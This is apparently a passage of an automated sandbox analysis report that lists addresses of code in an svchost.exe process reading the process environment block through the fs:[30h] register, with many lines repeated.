Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0332826B mov eax, dword ptr fs:[00000030h]	5_2_0332826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0332A250 mov eax, dword ptr fs:[00000030h]	5_2_0332A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03336259 mov eax, dword ptr fs:[00000030h]	5_2_03336259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033EA250 mov eax, dword ptr fs:[00000030h]	5_2_033EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033EA250 mov eax, dword ptr fs:[00000030h]	5_2_033EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033B8243 mov eax, dword ptr fs:[00000030h]	5_2_033B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033B8243 mov ecx, dword ptr fs:[00000030h]	5_2_033B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033402A0 mov eax, dword ptr fs:[00000030h]	5_2_033402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033402A0 mov eax, dword ptr fs:[00000030h]	5_2_033402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_034062D6 mov eax, dword ptr fs:[00000030h]	5_2_034062D6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033C62A0 mov eax, dword ptr fs:[00000030h]	5_2_033C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033C62A0 mov ecx, dword ptr fs:[00000030h]	5_2_033C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033C62A0 mov eax, dword ptr fs:[00000030h]	5_2_033C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033C62A0 mov eax, dword ptr fs:[00000030h]	5_2_033C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033C62A0 mov eax, dword ptr fs:[00000030h]	5_2_033C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033C62A0 mov eax, dword ptr fs:[00000030h]	5_2_033C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0336E284 mov eax, dword ptr fs:[00000030h]	5_2_0336E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0336E284 mov eax, dword ptr fs:[00000030h]	5_2_0336E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033B0283 mov eax, dword ptr fs:[00000030h]	5_2_033B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033B0283 mov eax, dword ptr fs:[00000030h]	5_2_033B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033B0283 mov eax, dword ptr fs:[00000030h]	5_2_033B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033402E1 mov eax, dword ptr fs:[00000030h]	5_2_033402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033402E1 mov eax, dword ptr fs:[00000030h]	5_2_033402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033402E1 mov eax, dword ptr fs:[00000030h]	5_2_033402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0333A2C3 mov eax, dword ptr fs:[00000030h]	5_2_0333A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0333A2C3 mov eax, dword ptr fs:[00000030h]	5_2_0333A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0333A2C3 mov eax, dword ptr fs:[00000030h]	5_2_0333A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0333A2C3 mov eax, dword ptr fs:[00000030h]	5_2_0333A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0333A2C3 mov eax, dword ptr fs:[00000030h]	5_2_0333A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03360124 mov eax, dword ptr fs:[00000030h]	5_2_03360124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03404164 mov eax, dword ptr fs:[00000030h]	5_2_03404164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03404164 mov eax, dword ptr fs:[00000030h]	5_2_03404164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033DA118 mov ecx, dword ptr fs:[00000030h]	5_2_033DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033DA118 mov eax, dword ptr fs:[00000030h]	5_2_033DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033DA118 mov eax, dword ptr fs:[00000030h]	5_2_033DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033DA118 mov eax, dword ptr fs:[00000030h]	5_2_033DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033F0115 mov eax, dword ptr fs:[00000030h]	5_2_033F0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033DE10E mov eax, dword ptr fs:[00000030h]	5_2_033DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033DE10E mov ecx, dword ptr fs:[00000030h]	5_2_033DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033DE10E mov eax, dword ptr fs:[00000030h]	5_2_033DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033DE10E mov eax, dword ptr fs:[00000030h]	5_2_033DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033DE10E mov ecx, dword ptr fs:[00000030h]	5_2_033DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033DE10E mov eax, dword ptr fs:[00000030h]	5_2_033DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033DE10E mov eax, dword ptr fs:[00000030h]	5_2_033DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033DE10E mov ecx, dword ptr fs:[00000030h]	5_2_033DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033DE10E mov eax, dword ptr fs:[00000030h]	5_2_033DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033DE10E mov ecx, dword ptr fs:[00000030h]	5_2_033DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0332C156 mov eax, dword ptr fs:[00000030h]	5_2_0332C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033C8158 mov eax, dword ptr fs:[00000030h]	5_2_033C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03336154 mov eax, dword ptr fs:[00000030h]	5_2_03336154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03336154 mov eax, dword ptr fs:[00000030h]	5_2_03336154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033C4144 mov eax, dword ptr fs:[00000030h]	5_2_033C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033C4144 mov eax, dword ptr fs:[00000030h]	5_2_033C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033C4144 mov ecx, dword ptr fs:[00000030h]	5_2_033C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033C4144 mov eax, dword ptr fs:[00000030h]	5_2_033C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033C4144 mov eax, dword ptr fs:[00000030h]	5_2_033C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033B019F mov eax, dword ptr fs:[00000030h]	5_2_033B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033B019F mov eax, dword ptr fs:[00000030h]	5_2_033B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033B019F mov eax, dword ptr fs:[00000030h]	5_2_033B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033B019F mov eax, dword ptr fs:[00000030h]	5_2_033B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0332A197 mov eax, dword ptr fs:[00000030h]	5_2_0332A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0332A197 mov eax, dword ptr fs:[00000030h]	5_2_0332A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0332A197 mov eax, dword ptr fs:[00000030h]	5_2_0332A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_034061E5 mov eax, dword ptr fs:[00000030h]	5_2_034061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03370185 mov eax, dword ptr fs:[00000030h]	5_2_03370185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033EC188 mov eax, dword ptr fs:[00000030h]	5_2_033EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033EC188 mov eax, dword ptr fs:[00000030h]	5_2_033EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033D4180 mov eax, dword ptr fs:[00000030h]	5_2_033D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033D4180 mov eax, dword ptr fs:[00000030h]	5_2_033D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033601F8 mov eax, dword ptr fs:[00000030h]	5_2_033601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033AE1D0 mov eax, dword ptr fs:[00000030h]	5_2_033AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033AE1D0 mov eax, dword ptr fs:[00000030h]	5_2_033AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033AE1D0 mov ecx, dword ptr fs:[00000030h]	5_2_033AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033AE1D0 mov eax, dword ptr fs:[00000030h]	5_2_033AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033AE1D0 mov eax, dword ptr fs:[00000030h]	5_2_033AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033F61C3 mov eax, dword ptr fs:[00000030h]	5_2_033F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033F61C3 mov eax, dword ptr fs:[00000030h]	5_2_033F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033C6030 mov eax, dword ptr fs:[00000030h]	5_2_033C6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0332A020 mov eax, dword ptr fs:[00000030h]	5_2_0332A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0332C020 mov eax, dword ptr fs:[00000030h]	5_2_0332C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0334E016 mov eax, dword ptr fs:[00000030h]	5_2_0334E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0334E016 mov eax, dword ptr fs:[00000030h]	5_2_0334E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0334E016 mov eax, dword ptr fs:[00000030h]	5_2_0334E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0334E016 mov eax, dword ptr fs:[00000030h]	5_2_0334E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033B4000 mov ecx, dword ptr fs:[00000030h]	5_2_033B4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033D2000 mov eax, dword ptr fs:[00000030h]	5_2_033D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033D2000 mov eax, dword ptr fs:[00000030h]	5_2_033D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033D2000 mov eax, dword ptr fs:[00000030h]	5_2_033D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033D2000 mov eax, dword ptr fs:[00000030h]	5_2_033D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033D2000 mov eax, dword ptr fs:[00000030h]	5_2_033D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033D2000 mov eax, dword ptr fs:[00000030h]	5_2_033D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033D2000 mov eax, dword ptr fs:[00000030h]	5_2_033D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033D2000 mov eax, dword ptr fs:[00000030h]	5_2_033D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0335C073 mov eax, dword ptr fs:[00000030h]	5_2_0335C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03332050 mov eax, dword ptr fs:[00000030h]	5_2_03332050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033B6050 mov eax, dword ptr fs:[00000030h]	5_2_033B6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033F60B8 mov eax, dword ptr fs:[00000030h]	5_2_033F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033F60B8 mov ecx, dword ptr fs:[00000030h]	5_2_033F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033280A0 mov eax, dword ptr fs:[00000030h]	5_2_033280A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033C80A8 mov eax, dword ptr fs:[00000030h]	5_2_033C80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0333208A mov eax, dword ptr fs:[00000030h]	5_2_0333208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0332C0F0 mov eax, dword ptr fs:[00000030h]	5_2_0332C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033720F0 mov ecx, dword ptr fs:[00000030h]	5_2_033720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0332A0E3 mov ecx, dword ptr fs:[00000030h]	5_2_0332A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033380E9 mov eax, dword ptr fs:[00000030h]	5_2_033380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033B60E0 mov eax, dword ptr fs:[00000030h]	5_2_033B60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033B20DE mov eax, dword ptr fs:[00000030h]	5_2_033B20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0336273C mov eax, dword ptr fs:[00000030h]	5_2_0336273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0336273C mov ecx, dword ptr fs:[00000030h]	5_2_0336273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0336273C mov eax, dword ptr fs:[00000030h]	5_2_0336273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033AC730 mov eax, dword ptr fs:[00000030h]	5_2_033AC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0336C720 mov eax, dword ptr fs:[00000030h]	5_2_0336C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0336C720 mov eax, dword ptr fs:[00000030h]	5_2_0336C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03330710 mov eax, dword ptr fs:[00000030h]	5_2_03330710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03360710 mov eax, dword ptr fs:[00000030h]	5_2_03360710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0336C700 mov eax, dword ptr fs:[00000030h]	5_2_0336C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03338770 mov eax, dword ptr fs:[00000030h]	5_2_03338770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03340770 mov eax, dword ptr fs:[00000030h]	5_2_03340770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03340770 mov eax, dword ptr fs:[00000030h]	5_2_03340770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03340770 mov eax, dword ptr fs:[00000030h]	5_2_03340770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03340770 mov eax, dword ptr fs:[00000030h]	5_2_03340770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03340770 mov eax, dword ptr fs:[00000030h]	5_2_03340770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03340770 mov eax, dword ptr fs:[00000030h]	5_2_03340770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03340770 mov eax, dword ptr fs:[00000030h]	5_2_03340770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03340770 mov eax, dword ptr fs:[00000030h]	5_2_03340770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03340770 mov eax, dword ptr fs:[00000030h]	5_2_03340770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03340770 mov eax, dword ptr fs:[00000030h]	5_2_03340770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03340770 mov eax, dword ptr fs:[00000030h]	5_2_03340770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03340770 mov eax, dword ptr fs:[00000030h]	5_2_03340770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03330750 mov eax, dword ptr fs:[00000030h]	5_2_03330750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033BE75D mov eax, dword ptr fs:[00000030h]	5_2_033BE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03372750 mov eax, dword ptr fs:[00000030h]	5_2_03372750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03372750 mov eax, dword ptr fs:[00000030h]	5_2_03372750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033B4755 mov eax, dword ptr fs:[00000030h]	5_2_033B4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0336674D mov esi, dword ptr fs:[00000030h]	5_2_0336674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0336674D mov eax, dword ptr fs:[00000030h]	5_2_0336674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0336674D mov eax, dword ptr fs:[00000030h]	5_2_0336674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033307AF mov eax, dword ptr fs:[00000030h]	5_2_033307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033E47A0 mov eax, dword ptr fs:[00000030h]	5_2_033E47A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033D678E mov eax, dword ptr fs:[00000030h]	5_2_033D678E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033347FB mov eax, dword ptr fs:[00000030h]	5_2_033347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033347FB mov eax, dword ptr fs:[00000030h]	5_2_033347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033527ED mov eax, dword ptr fs:[00000030h]	5_2_033527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033527ED mov eax, dword ptr fs:[00000030h]	5_2_033527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033527ED mov eax, dword ptr fs:[00000030h]	5_2_033527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033BE7E1 mov eax, dword ptr fs:[00000030h]	5_2_033BE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0333C7C0 mov eax, dword ptr fs:[00000030h]	5_2_0333C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033B07C3 mov eax, dword ptr fs:[00000030h]	5_2_033B07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0334E627 mov eax, dword ptr fs:[00000030h]	5_2_0334E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03366620 mov eax, dword ptr fs:[00000030h]	5_2_03366620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03368620 mov eax, dword ptr fs:[00000030h]	5_2_03368620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0333262C mov eax, dword ptr fs:[00000030h]	5_2_0333262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03372619 mov eax, dword ptr fs:[00000030h]	5_2_03372619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033AE609 mov eax, dword ptr fs:[00000030h]	5_2_033AE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0334260B mov eax, dword ptr fs:[00000030h]	5_2_0334260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0334260B mov eax, dword ptr fs:[00000030h]	5_2_0334260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0334260B mov eax, dword ptr fs:[00000030h]	5_2_0334260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0334260B mov eax, dword ptr fs:[00000030h]	5_2_0334260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0334260B mov eax, dword ptr fs:[00000030h]	5_2_0334260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0334260B mov eax, dword ptr fs:[00000030h]	5_2_0334260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0334260B mov eax, dword ptr fs:[00000030h]	5_2_0334260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03362674 mov eax, dword ptr fs:[00000030h]	5_2_03362674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033F866E mov eax, dword ptr fs:[00000030h]	5_2_033F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033F866E mov eax, dword ptr fs:[00000030h]	5_2_033F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0336A660 mov eax, dword ptr fs:[00000030h]	5_2_0336A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0336A660 mov eax, dword ptr fs:[00000030h]	5_2_0336A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0334C640 mov eax, dword ptr fs:[00000030h]	5_2_0334C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033666B0 mov eax, dword ptr fs:[00000030h]	5_2_033666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0336C6A6 mov eax, dword ptr fs:[00000030h]	5_2_0336C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03334690 mov eax, dword ptr fs:[00000030h]	5_2_03334690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03334690 mov eax, dword ptr fs:[00000030h]	5_2_03334690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033AE6F2 mov eax, dword ptr fs:[00000030h]	5_2_033AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033AE6F2 mov eax, dword ptr fs:[00000030h]	5_2_033AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033AE6F2 mov eax, dword ptr fs:[00000030h]	5_2_033AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033AE6F2 mov eax, dword ptr fs:[00000030h]	5_2_033AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033B06F1 mov eax, dword ptr fs:[00000030h]	5_2_033B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033B06F1 mov eax, dword ptr fs:[00000030h]	5_2_033B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0336A6C7 mov ebx, dword ptr fs:[00000030h]	5_2_0336A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0336A6C7 mov eax, dword ptr fs:[00000030h]	5_2_0336A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03340535 mov eax, dword ptr fs:[00000030h]	5_2_03340535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03340535 mov eax, dword ptr fs:[00000030h]	5_2_03340535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03340535 mov eax, dword ptr fs:[00000030h]	5_2_03340535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03340535 mov eax, dword ptr fs:[00000030h]	5_2_03340535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03340535 mov eax, dword ptr fs:[00000030h]	5_2_03340535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03340535 mov eax, dword ptr fs:[00000030h]	5_2_03340535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0335E53E mov eax, dword ptr fs:[00000030h]	5_2_0335E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0335E53E mov eax, dword ptr fs:[00000030h]	5_2_0335E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0335E53E mov eax, dword ptr fs:[00000030h]	5_2_0335E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0335E53E mov eax, dword ptr fs:[00000030h]	5_2_0335E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0335E53E mov eax, dword ptr fs:[00000030h]	5_2_0335E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033C6500 mov eax, dword ptr fs:[00000030h]	5_2_033C6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03404500 mov eax, dword ptr fs:[00000030h]	5_2_03404500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03404500 mov eax, dword ptr fs:[00000030h]	5_2_03404500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03404500 mov eax, dword ptr fs:[00000030h]	5_2_03404500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03404500 mov eax, dword ptr fs:[00000030h]	5_2_03404500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03404500 mov eax, dword ptr fs:[00000030h]	5_2_03404500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03404500 mov eax, dword ptr fs:[00000030h]	5_2_03404500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03404500 mov eax, dword ptr fs:[00000030h]	5_2_03404500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0336656A mov eax, dword ptr fs:[00000030h]	5_2_0336656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0336656A mov eax, dword ptr fs:[00000030h]	5_2_0336656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0336656A mov eax, dword ptr fs:[00000030h]	5_2_0336656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03338550 mov eax, dword ptr fs:[00000030h]	5_2_03338550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03338550 mov eax, dword ptr fs:[00000030h]	5_2_03338550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033545B1 mov eax, dword ptr fs:[00000030h]	5_2_033545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033545B1 mov eax, dword ptr fs:[00000030h]	5_2_033545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033B05A7 mov eax, dword ptr fs:[00000030h]	5_2_033B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033B05A7 mov eax, dword ptr fs:[00000030h]	5_2_033B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033B05A7 mov eax, dword ptr fs:[00000030h]	5_2_033B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0336E59C mov eax, dword ptr fs:[00000030h]	5_2_0336E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03332582 mov eax, dword ptr fs:[00000030h]	5_2_03332582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03332582 mov ecx, dword ptr fs:[00000030h]	5_2_03332582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03364588 mov eax, dword ptr fs:[00000030h]	5_2_03364588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0335E5E7 mov eax, dword ptr fs:[00000030h]	5_2_0335E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0335E5E7 mov eax, dword ptr fs:[00000030h]	5_2_0335E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0335E5E7 mov eax, dword ptr fs:[00000030h]	5_2_0335E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0335E5E7 mov eax, dword ptr fs:[00000030h]	5_2_0335E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0335E5E7 mov eax, dword ptr fs:[00000030h]	5_2_0335E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0335E5E7 mov eax, dword ptr fs:[00000030h]	5_2_0335E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0335E5E7 mov eax, dword ptr fs:[00000030h]	5_2_0335E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0335E5E7 mov eax, dword ptr fs:[00000030h]	5_2_0335E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033325E0 mov eax, dword ptr fs:[00000030h]	5_2_033325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0336C5ED mov eax, dword ptr fs:[00000030h]	5_2_0336C5ED
